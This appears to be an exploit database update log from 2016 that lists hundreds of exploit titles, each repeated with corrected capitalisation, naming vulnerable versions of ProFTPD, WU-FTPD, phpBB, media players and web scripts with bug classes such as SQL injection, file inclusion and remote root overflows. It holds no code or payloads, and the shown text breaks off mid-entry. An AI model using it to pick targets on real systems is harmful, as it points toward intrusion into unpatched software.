DB: 2016-09-06
5 new exploits ProFTPD 1.2.9RC1 - (mod_sql) SQL Injection ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection PHPBB 2.0.4 - PHP Remote File Inclusion Exploit phpBB 2.0.4 - PHP Remote File Inclusion Exploit wu-ftpd 2.6.2 - Off-by-One Remote Root Exploit WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit wu-ftpd 2.6.2 - Remote Root Exploit WU-FTPD 2.6.2 - Remote Root Exploit ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / brute-force Exploit wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service WU-FTPD 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service wu-ftpd 2.6.0 - Remote Root Exploit WU-FTPD 2.6.0 - Remote Root Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit OpenBSD 2.6 / 2.7 ftpd - Remote Exploit wu-ftpd 2.6.0 - Remote Format Strings Exploit WU-FTPD 2.6.0 - Remote Format Strings Exploit ProFTPD 1.2.0 (rc2) - memory leakage example Exploit ProFTPd 1.2.0 (rc2) - memory leakage example Exploit ProFTPD 1.2.0pre10 - Remote Denial of Service ProFTPd 1.2.0pre10 - Remote Denial of Service wu-ftpd 2.6.1 - Remote Root Exploit WU-FTPD 2.6.1 - Remote Root Exploit OpenFTPD 0.30.2 - Remote Exploit OpenFTPD 0.30.1 - (message system) Remote Shell Exploit OpenFTPd 0.30.2 - Remote Exploit OpenFTPd 0.30.1 - (message system) Remote Shell Exploit PHP - (PHP-exec-dir) Patch Command Access Restriction Bypass PHP - (php-exec-dir) Patch Command Access Restriction Bypass ProFTPd (ftpdctl) - Local pr_ctrls_connect ProFTPd - (ftpdctl) Local pr_ctrls_connect ProFTPD 1.2.10 - Remote Users Enumeration Exploit ProFTPd 1.2.10 - Remote Users Enumeration Exploit PHPBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit PHP 4.3.9 + PHPBB 2.x - unserialize() Remote Exploit (Compiled) PHP 4.3.9 + phpBB 2.x - unserialize() Remote Exploit (Compiled) Apple QuickTime 6.5.2.10 - '.qtif'Image Parsing Apple 
QuickTime 6.5.2.10 - '.qtif' Image Parsing wu-ftpd 2.6.2 - File Globbing Denial of Service WU-FTPD 2.6.2 - File Globbing Denial of Service RealPlayer 10 - '.smil'Local Buffer Overflow RealPlayer 10 - '.smil' Local Buffer Overflow PHPBB 2.0.13 - 'downloads.php' mod Remote Exploit phpBB 2.0.13 - 'downloads.php' mod Remote Exploit PHPPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting Invision Power Board 2.0.3 - login.php SQL Injection Invision Power Board 2.0.3 - login.php SQL Injection (tutorial) Invision Power Board 2.0.3 - 'login.php' SQL Injection Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1) PHPStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (Perl) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1) phpStat 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (2) Invision Power Board 1.3.1 - login.php SQL Injection Invision Power Board 1.3.1 - 'login.php' SQL Injection PHPBB 2.0.15 - (highlight) Remote PHP Code Execution phpBB 2.0.15 - (highlight) Remote PHP Code Execution Solaris SPARC / x86 - Local Socket Hijack Exploit Solaris (SPARC / x86) - Local Socket Hijack Exploit PHPBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit) phpBB 2.0.15 - Remote PHP Code Execution Exploit (Metasploit) Microsoft Windows XP SP2 - 'rdpwd.sys'Remote Kernel Denial of Service Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service PHPBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit FreeFTPD 1.0.8 - (USER) Remote Buffer Overflow freeFTPd 1.0.8 - (USER) Remote Buffer Overflow FreeFTPD 1.0.10 - (PORT Command) Denial of Service freeFTPd 1.0.10 - (PORT Command) Denial of Service Tftpd32 2.81 - (GET 
Request) Format String Denial of Service (PoC) TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC) Microsoft HTML Help Workshop - '.hhp'Denial of Service Microsoft HTML Help Workshop - '.hhp' Denial of Service PHPWebSite 0.10.0-full - (topics.php) SQL Injection phpWebSite 0.10.0-full - (topics.php) SQL Injection Microsoft Visual Studio 6.0 sp6 - '.dbp'Buffer Overflow Microsoft Visual Studio 6.0 sp6 - '.dbp' Buffer Overflow PHPBookingCalendar 1.0c - (details_view.php) SQL Injection phpBookingCalendar 1.0c - (details_view.php) SQL Injection Navicat Premium 11.2.11 (64bit) - Local Database Password Disclosure Microsoft Internet Explorer 6 - 'Internet.HHCtrl'Heap Overflow Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow PHPBB 3 - 'memberlist.php' SQL Injection phpBB 3 - 'memberlist.php' SQL Injection WoW Roster 1.70 - (/lib/PHPbb.php) Remote File Inclusion WoW Roster 1.70 - (/lib/phpBB.php) Remote File Inclusion PHPBB XS 0.58 - (functions.php) Remote File Inclusion phpBB XS 0.58 - (functions.php) Remote File Inclusion phpBB XS 0.58a - (phpbb_root_path) Remote File Inclusion phpBB XS 0.58a - (phpBB_root_path) Remote File Inclusion phpBB Static Topics 1.0 - phpbb_root_path File Include phpBB Static Topics 1.0 - phpBB_root_path File Include PHPBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion Dimension of phpBB 0.2.6 - (phpbb_root_path) Remote File Inclusions phpBB Security Suite Mod 1.0.0 - (logger_engine.php) Remote File Inclusion Dimension of phpBB 0.2.6 - (phpBB_root_path) Remote File Inclusions PHP News Reader 2.6.4 - (PHPbb.inc.php) Remote File Inclusion Exploit PHP News Reader 2.6.4 - (phpBB.inc.php) Remote File Inclusion Exploit PHPBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit phpBB PlusXL 2.0_272 - (constants.php) Remote File Inclusion Exploit PHPBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit phpBB Amazonia Mod - 'zufallscodepart.php' Remote File Inclusion Exploit PHPBB 
lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Inclusion Exploit PHPBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion Exploit PHPBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit phpBB Security 1.0.1 - (PHP_security.php) Remote File Inclusion Exploit PGOSD - 'misc/function.php3'Remote File Inclusion PGOSD - 'misc/function.php3' Remote File Inclusion HP-UX 11i - (LIBC TZ enviroment variable) Privilege Escalation HP-UX 11i - (LIBC TZ enviroment Variable) Privilege Escalation ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit) ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit) ProFTPD 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC) ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC) ProFTPD 1.2.9 rc2 - (ASCII File) Remote Root Exploit ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit Yrch 1.0 - (plug.inc.php path variable) Remote File Inclusion Exploit Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion Exploit Vizayn Haber - 'haberdetay.asp id variable'SQL Injection Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection newsCMSlite - 'newsCMS.mdb'Remote Password Disclosure newsCMSlite - 'newsCMS.mdb' Remote Password Disclosure iG Calendar 1.0 - (user.php id variable) SQL Injection iG Calendar 1.0 - (user.php id Variable) SQL Injection uniForum 4 - 'wbsearch.aspx'SQL Injection uniForum 4 - 'wbsearch.aspx' SQL Injection MGB 0.5.4.5 - (email.php id variable) SQL Injection MGB 0.5.4.5 - (email.php id Variable) SQL Injection Microsoft Help Workshop 4.03.0002 - '.CNT'Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.cnt' Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.HPJ'Buffer Overflow Microsoft Help Workshop 4.03.0002 - '.HPJ' Buffer Overflow Microsoft Visual C++ - '.RC Resource Files'Local Buffer Overflow Microsoft Visual C++ 
- '.RC Resource Files' Local Buffer Overflow Phpbb Tweaked 3 - (phpbb_root_path) Remote File Inclusion phpBB Tweaked 3 - (phpBB_root_path) Remote File Inclusion phpBB++ Build 100 - (phpbb_root_path) Remote File Inclusion Exploit phpBB++ Build 100 - (phpBB_root_path) Remote File Inclusion Exploit Categories hierarchy phpBB Mod 2.1.2 - (phpbb_root_path) Remote File Inclusion Exploit Categories hierarchy phpBB Mod 2.1.2 - (phpBB_root_path) Remote File Inclusion Exploit ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1) ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2) News Bin Pro 5.33 - '.NBI'Local Buffer Overflow News Bin Pro 5.33 - '.nbi' Local Buffer Overflow Extreme PHPBB 3.0.1 - (functions.php) Remote File Inclusion Exploit Extreme phpBB 3.0.1 - (functions.php) Remote File Inclusion Exploit Plan 9 Kernel - 'devenv.c OTRUNC/pwrite'Local Exploit Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local Exploit Microsoft Windows - '.doc'Malformed Pointers Denial of Service Microsoft Windows - '.doc' Malformed Pointers Denial of Service GestArt Beta 1 - 'aide.php aide'Remote File Inclusion GestArt Beta 1 - 'aide.php aide' Remote File Inclusion ttCMS 4 - 'ez_sql.php lib_path'Remote File Inclusion ttCMS 4 - 'ez_sql.php lib_path' Remote File Inclusion Corel Wordperfect X3 13.0.0.565 - '.PRS'Local Buffer Overflow Corel Wordperfect X3 13.0.0.565 - '.prs' Local Buffer Overflow ProFTPD 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield) ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield) Winamp 5.3 - '.WMV'Remote Denial of Service Winamp 5.3 - '.wmv' Remote Denial of Service ACDSee 9.0 - '.XPM'Local Buffer Overflow XnView 1.90.3 - '.XPM'Local Buffer Overflow WEBInsta FM 0.1.4 - login.php absolute_path Remote File Inclusion Exploit Corel Paint Shop Pro Photo 11.20 - '.CLP'Buffer Overflow ACDSee 
9.0 - '.xpm' Local Buffer Overflow XnView 1.90.3 - '.xpm' Local Buffer Overflow WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion Exploit Corel Paint Shop Pro Photo 11.20 - '.clp' Buffer Overflow ABC-View Manager 1.42 - '.PSP'Buffer Overflow FreshView 7.15 - '.PSP'Buffer Overflow ABC-View Manager 1.42 - '.psp' Buffer Overflow FreshView 7.15 - '.psp' Buffer Overflow Gimp 2.2.14 - '.ras'SUNRAS Plugin Buffer Overflow Gimp 2.2.14 - '.ras' SUNRAS Plugin Buffer Overflow IrfanView 4.00 - '.iff'Buffer Overflow Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png'Buffer Overflow Exploit IrfanView 4.00 - '.iff' Buffer Overflow Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow Exploit RealPlayer 10 - '.ra'Remote Denial of Service RealPlayer 10 - '.ra' Remote Denial of Service Winamp 5.34 - '.mp4'Code Execution Exploit Winamp 5.34 - '.mp4' Code Execution Exploit Wikivi5 - 'show.php sous_rep'Remote File Inclusion Wikivi5 - 'show.php sous_rep' Remote File Inclusion LeadTools Raster Thumbnail Object Library - 'LTRTM14e.DLL'Buffer Overflow Exploit LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Buffer Overflow Exploit Scallywag - 'template.php path'Remote File Inclusion Scallywag - 'template.php path' Remote File Inclusion Simple Invoices 2007 05 25 - 'index.php submit'SQL Injection Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection Traffic Stats - 'referralUrl.php offset'SQL Injection Traffic Stats - 'referralUrl.php offset' SQL Injection BBS E-Market - 'postscript.php p_mode'Remote File Inclusion BBS E-Market - 'postscript.php p_mode' Remote File Inclusion PHPBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion phpBB Module SupaNav 1.0.0 - (link_main.php) Remote File Inclusion bwired - 'index.php newsID'SQL Injection bwired - 'index.php newsID' SQL Injection CrystalPlayer 1.98 - '.mls'Local Buffer Overflow CrystalPlayer 1.98 - '.mls' Local Buffer Overflow PHP123 Top Sites - 'category.php cat'SQL Injection PHP123 Top 
Sites - 'category.php cat' SQL Injection Live for Speed S1/S2/Demo - '.mpr replay'Buffer Overflow Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow Microsoft Visual 6 - 'VDT70.dll NotSafe'Stack Overflow Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow Live for Speed S1/S2/Demo - '.ply'Buffer Overflow Live for Speed S1/S2/Demo - '.spr'Buffer Overflow CartWeaver - 'Details.cfm ProdID'SQL Injection Prozilla Pub Site Directory - 'directory.php cat'SQL Injection Live for Speed S1/S2/Demo - '.ply' Buffer Overflow Live for Speed S1/S2/Demo - '.spr' Buffer Overflow CartWeaver - 'Details.cfm ProdID' SQL Injection Prozilla Pub Site Directory - 'directory.php cat' SQL Injection Prozilla Webring Website Script - 'category.php cat'SQL Injection Prozilla Webring Website Script - 'category.php cat' SQL Injection GetMyOwnArcade - 'search.php query'SQL Injection GetMyOwnArcade - 'search.php query' SQL Injection ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow Sisfo Kampus 2006 - 'dwoprn.php f'Remote File Download Sisfo Kampus 2006 - 'dwoprn.php f' Remote File Download Gelato - 'index.php post'SQL Injection Gelato - 'index.php post' SQL Injection modifyform - 'modifyform.html'Remote File Inclusion modifyform - 'modifyform.html' Remote File Inclusion phpBB Plus 1.53 - (phpbb_root_path) Remote File Inclusion phpBB Plus 1.53 - (phpBB_root_path) Remote File Inclusion Black Lily 2007 - 'products.php class'SQL Injection Black Lily 2007 - 'products.php class' SQL Injection PHPBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion phpBB Mod OpenID 0.2.0 - BBStore.php Remote File Inclusion wzdftpd 0.8.0 - (USER) Remote Denial of Service WzdFTPD 0.8.0 - (USER) Remote Denial of Service Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc) Solaris 10 (sparc/x86) - sysinfo Kernel Memory Disclosure Exploit Solaris (sparc/x86) - fifofs I_PEEK 
Kernel Memory Disclosure Exploit Mcms Easy Web Make - 'index.php template'Local File Inclusion Mcms Easy Web Make - 'index.php template' Local File Inclusion MOG-WebShop - 'index.php group'SQL Injection MOG-WebShop - 'index.php group' SQL Injection ClipShare - 'uprofile.php UID'SQL Injection ClipShare - 'uprofile.php UID' SQL Injection samPHPweb - 'db.php commonpath'Remote File Inclusion samPHPweb - 'db.php commonpath' Remote File Inclusion RichStrong CMS - 'showproduct.asp cat'SQL Injection RichStrong CMS - 'showproduct.asp cat' SQL Injection Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr'File Handling Buffer Overflow Exploit Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Exploit IrfanView 4.10 - '.fpx'Memory Corruption Exploit IrfanView 4.10 - '.fpx' Memory Corruption Exploit Fully Modded PHPBB - 'kb.php' SQL Injection Fully Modded phpBB - 'kb.php' SQL Injection ASPapp - 'links.asp CatId'SQL Injection ASPapp - 'links.asp CatId' SQL Injection HIS-Webshop - 'his-webshop.pl t'Remote File Disclosure HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure Easynet Forum Host - 'forum.php forum'SQL Injection Easynet Forum Host - 'forum.php forum' SQL Injection Blog PixelMotion - 'index.php categorie'SQL Injection Blog PixelMotion - 'index.php categorie' SQL Injection Prozilla Forum Service - 'forum.php forum'SQL Injection Prozilla Forum Service - 'forum.php forum' SQL Injection Ksemail - 'index.php language'Local File Inclusion Ksemail - 'index.php language' Local File Inclusion RX Maxsoft - 'popup_img.php fotoID'SQL Injection RX Maxsoft - 'popup_img.php fotoID' SQL Injection Apartment Search Script - 'listtest.php r'SQL Injection Apartment Search Script - 'listtest.php r' SQL Injection Jokes Site Script - 'jokes.php?catagorie'SQL Injection Jokes Site Script - 'jokes.php?catagorie' SQL Injection Anserv Auction XL - 'viewfaqs.php cat'SQL Injection Anserv Auction XL - 'viewfaqs.php cat' SQL Injection fipsCMS - 'print.asp lg'SQL 
Injection fipsCMS - 'print.asp lg' SQL Injection PostcardMentor - 'step1.asp cat_fldAuto'SQL Injection PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection HispaH Model Search - 'cat.php cat'SQL Injection HispaH Model Search - 'cat.php cat' SQL Injection EMO Realty Manager - 'news.php ida'SQL Injection The Real Estate Script - 'dpage.php docID'SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection GLLCTS2 - 'listing.php sort'Blind SQL Injection GLLCTS2 - 'listing.php sort' Blind SQL Injection PHPMyCart - 'shop.php cat'SQL Injection PHPMyCart - 'shop.php cat' SQL Injection BaSiC-CMS - 'index.php r'SQL Injection BaSiC-CMS - 'index.php r' SQL Injection Mybizz-Classifieds - 'index.php cat'SQL Injection Mybizz-Classifieds - 'index.php cat' SQL Injection Carscripts Classifieds - 'index.php cat'SQL Injection BoatScripts Classifieds - 'index.php type'SQL Injection Carscripts Classifieds - 'index.php cat' SQL Injection BoatScripts Classifieds - 'index.php type' SQL Injection RSS-Aggregator - 'display.php path'Remote File Inclusion RSS-Aggregator - 'display.php path' Remote File Inclusion MyBlog: PHP and MySQL Blog/CMS software - SQL / Cross-Site Scripting MyBlog: PHP and MySQL Blog/CMS software - SQL Injection / Cross-Site Scripting CodeDB - 'list.php lang'Local File Inclusion CodeDB - 'list.php lang' Local File Inclusion HRS Multi - 'picture_pic_bv.asp key'Blind SQL Injection HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection MojoPersonals - 'mojoClassified.cgi mojo'Blind SQL Injection MojoJobs - 'mojoJobs.cgi mojo'Blind SQL Injection MojoAuto - 'mojoAuto.cgi mojo'Blind SQL Injection MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection Youtuber Clone - 'ugroups.php UID'SQL Injection Youtuber Clone - 'ugroups.php UID' SQL Injection ZeeReviews - 'comments.php ItemID'SQL Injection ZeeReviews - 
'comments.php ItemID' SQL Injection Acoustica Beatcraft 1.02 Build 19 - '.bcproj'Local Buffer Overflow Exploit Acoustica Beatcraft 1.02 Build 19 - '.bcproj' Local Buffer Overflow Exploit Living Local Website - 'listtest.php r'SQL Injection Living Local Website - 'listtest.php r' SQL Injection AWStats Totals - 'AWStatstotals.php sort'Remote Code Execution Exploit AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution Exploit Pre Real Estate Listings - 'search.php c'SQL Injection Pre Real Estate Listings - 'search.php c' SQL Injection Hotel reservation System - 'city.asp city'Blind SQL Injection Hotel reservation System - 'city.asp city' Blind SQL Injection Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward'Local Denial of Service Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service Availscript Article Script - 'view.php v'SQL Injection Availscript Article Script - 'view.php v' SQL Injection JETIK-WEB Software - 'sayfa.php kat'SQL Injection JETIK-WEB Software - 'sayfa.php kat' SQL Injection Microsoft Windows GDI+ - '.ico'Remote Division By Zero Exploit Microsoft Windows GDI+ - '.ico' Remote Division By Zero Exploit ArabCMS - 'rss.php rss'Local File Inclusion ArabCMS - 'rss.php rss' Local File Inclusion Easynet4u faq Host - 'faq.php faq'SQL Injection Easynet4u faq Host - 'faq.php faq' SQL Injection Real Estate Scripts 2008 - 'index.php cat'SQL Injection Real Estate Scripts 2008 - 'index.php cat' SQL Injection RaidenFTPD 2.4 build 3620 - Remote Denial of Service RaidenFTPd 2.4 build 3620 - Remote Denial of Service XOOPS Module xhresim - 'index.php no'SQL Injection XOOPS Module xhresim - 'index.php no' SQL Injection Solaris 9 - [UltraSPARC] sadmind Remote Root Exploit Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit DorsaCMS - 'ShowPage.aspx'SQL Injection YDC - 'kdlist.php cat'SQL Injection DorsaCMS - 'ShowPage.aspx' SQL Injection YDC - 'kdlist.php cat' SQL Injection Aj RSS Reader - 'EditUrl.php url'SQL Injection Aj RSS Reader - 
'EditUrl.php url' SQL Injection Aiocp 1.4 - (poll_id) SQL Injection AIOCP 1.4 - 'poll_id' SQL Injection SFS EZ Auction - 'viewfaqs.php cat'Blind SQL Injection SFS EZ Career - 'content.php topic'SQL Injection SFS EZ Top Sites - 'topsite.php ts'SQL Injection SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection SFS EZ Career - 'content.php topic' SQL Injection SFS EZ Top Sites - 'topsite.php ts' SQL Injection SFS EZ Pub Site - 'directory.php cat'SQL Injection SFS EZ Pub Site - 'directory.php cat' SQL Injection AJ ARTICLE - 'featured_article.php mode'SQL Injection AJ ARTICLE - 'featured_article.php mode' SQL Injection YourFreeWorld Shopping Cart - 'index.php c'Blind SQL Injection Maran PHP Shop - 'prod.php cat'SQL Injection YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection Maran PHP Shop - 'prod.php cat' SQL Injection PHP Auto Listings - 'moreinfo.php pg'SQL Injection PHP Auto Listings - 'moreinfo.php pg' SQL Injection VLC Media Player < 0.9.6 - '.rt'Stack Buffer Overflow VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow Minigal b13 - 'index.php list'Remote File Disclosure Exploit Minigal b13 - 'index.php list' Remote File Disclosure Exploit VCalendar - 'VCalendar.mdb'Remote Database Disclosure VCalendar - 'VCalendar.mdb' Remote Database Disclosure VideoGirls BiZ - 'view_snaps.php type'Blind SQL Injection VideoGirls BiZ - 'view_snaps.php type' Blind SQL Injection ParsBlogger - 'blog.asp wr'SQL Injection ParsBlogger - 'blog.asp wr' SQL Injection BaSiC-CMS - 'acm2000.mdb'Remote Database Disclosure BaSiC-CMS - 'acm2000.mdb' Remote Database Disclosure cpCommerce 1.2.6 - (URL Rewrite) Input variable overwrite / Authentication Bypass Cain & Abel 4.9.24 - '.rdp'Stack Overflow cpCommerce 1.2.6 - (URL Rewrite) Input Variable overwrite / Authentication Bypass Cain & Abel 4.9.24 - '.rdp' Stack Overflow Ocean12 Mailing List Manager Gold - DD / SQL / Cross-Site Scripting Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting 
Cain & Abel 4.9.23 - '.rdp'Buffer Overflow Exploit Cain & Abel 4.9.23 - '.rdp' Buffer Overflow Exploit User Engine Lite ASP - 'users.mdb'Database Disclosure User Engine Lite ASP - 'users.mdb' Database Disclosure Easy News Content Management - 'News.mdb'Database Disclosure Easy News Content Management - 'News.mdb' Database Disclosure RankEm - 'rankup.asp siteID'SQL Injection RankEm - 'rankup.asp siteID' SQL Injection Cold BBS - 'cforum.mdb'Remote Database Disclosure Cold BBS - 'cforum.mdb' Remote Database Disclosure ASP PORTAL - 'xportal.mdb'Remote Database Disclosure ASP PORTAL - 'xportal.mdb' Remote Database Disclosure Webmaster Marketplace - 'member.php u'SQL Injection Webmaster Marketplace - 'member.php u' SQL Injection CF_Calendar - 'calendarevent.cfm'SQL Injection CF_Calendar - 'calendarevent.cfm' SQL Injection CFMBLOG - 'index.cfm categorynbr'Blind SQL Injection CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection MyCal Personal Events Calendar - 'mycal.mdb'Database Disclosure MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure ASPired2Quote - 'quote.mdb'Remote Database Disclosure ASPired2Quote - 'quote.mdb' Remote Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb'Database Disclosure CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb'Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb'Database Disclosure CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb'Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb'Database Disclosure CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure CFAGCMS 1 - 'right.php title'SQL Injection CFAGCMS 1 - 'right.php title' SQL Injection click&rank - SQL / Cross-Site Scripting click&rank - SQL Injection / Cross-Site Scripting Liberum Help Desk 0.97.3 
- SQL / DD Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure QuickerSite Easy CMS - 'QuickerSite.mdb'Database Disclosure QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure MyPHPsite - 'index.php mod'Local File Inclusion MyPHPsite - 'index.php mod' Local File Inclusion MyPBS - 'index.php seasonID'SQL Injection MyPBS - 'index.php seasonID' SQL Injection Extract Website - 'download.php filename'File Disclosure Extract Website - 'download.php filename' File Disclosure CoolPlayer 2.19 - '.Skin'Local Buffer Overflow CoolPlayer 2.19 - '.Skin' Local Buffer Overflow Sepcity Shopping Mall - 'shpdetails.asp ID'SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID'SQL Injection Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Sepcity Classified - 'classdis.asp ID'SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection Ayemsis Emlak Pro - 'acc.mdb'Database Disclosure Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure VUPlayer 2.49 - '.wax'Local Buffer Overflow VUPlayer 2.49 - '.wax' Local Buffer Overflow BlogHelper - 'common_db.inc'Remote Config File Disclosure PollHelper - 'poll.inc'Remote Config File Disclosure BlogHelper - 'common_db.inc' Remote Config File Disclosure PollHelper - 'poll.inc' Remote Config File Disclosure Audacity 1.6.2 - '.aup'Remote Off-by-One Crash Exploit Audacity 1.6.2 - '.aup' Remote Off-by-One Crash Exploit QuoteBook - 'poll.inc'Remote Config File Disclosure QuoteBook - 'poll.inc' Remote Config File Disclosure XOOPS Module tadbook2 - 'open_book.php book_sn'SQL Injection XOOPS Module tadbook2 - 'open_book.php book_sn' SQL Injection Social Engine - 'browse_classifieds.php s'SQL Injection Social Engine - 'browse_classifieds.php s' SQL Injection Realtor 747 - 'define.php INC_DIR'Remote File Inclusion Realtor 747 - 'define.php INC_DIR' Remote File Inclusion OTSTurntables 1.00.027 - '.ofl'Local Stack Overflow OTSTurntables 1.00.027 - '.ofl' Local Stack 
Overflow SCMS 1 - 'index.php p'Local File Inclusion SCMS 1 - 'index.php p' Local File Inclusion Graugon Gallery 1.0 - Cross-Site Scripting / SQL / Cookie Bypass Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass Baran CMS 1.0 - Arbitrary ASP File Upload / DB / SQL / Cross-Site Scripting / CM Baran CMS 1.0 - Arbitrary ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / CM pHNews Alpha 1 - 'header.php mod'SQL Injection pHNews Alpha 1 - 'header.php mod' SQL Injection i-dreams GB Server - 'admin.dat'File Disclosure i-dreams GB Server - 'admin.dat' File Disclosure VUplayer 2.49 - '.cue'Local Buffer Overflow VUplayer 2.49 - '.cue' Local Buffer Overflow VUPlayer 2.49 - '.cue'Universal Buffer Overflow VUPlayer 2.49 - '.cue' Universal Buffer Overflow Chasys Media Player 1.1 - '.cue'Stack Overflow Chasys Media Player 1.1 - '.cue' Stack Overflow Chasys Media Player - '.lst Playlist'Local Buffer Overflow Chasys Media Player - '.lst Playlist' Local Buffer Overflow BS.Player 2.34 - '.bsl'Universal SEH Overwrite BS.Player 2.34 - '.bsl' Universal SEH Overwrite POP Peeper 3.4.0.0 - '.eml'Universal SEH Overwrite POP Peeper 3.4.0.0 - '.eml' Universal SEH Overwrite Abee Chm Maker 1.9.5 - '.CMP'Stack Overflow Abee Chm Maker 1.9.5 - '.CMP' Stack Overflow ActiveKB Knowledgebase - 'loadpanel.php Panel'Local File Inclusion ActiveKB Knowledgebase - 'loadpanel.php Panel' Local File Inclusion ftpdmin 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) FTPDMIN 0.96 - RNFR Remote Buffer Overflow (xp sp3/case study) ftpdmin 0.96 - Arbitrary File Disclosure Exploit FTPDMIN 0.96 - Arbitrary File Disclosure Exploit Jamroom - 'index.php t'Local File Inclusion Jamroom - 'index.php t' Local File Inclusion W2B phpEmployment - 'conf.inc'File Disclosure W2B phpEmployment - 'conf.inc' File Disclosure phpAdBoard - 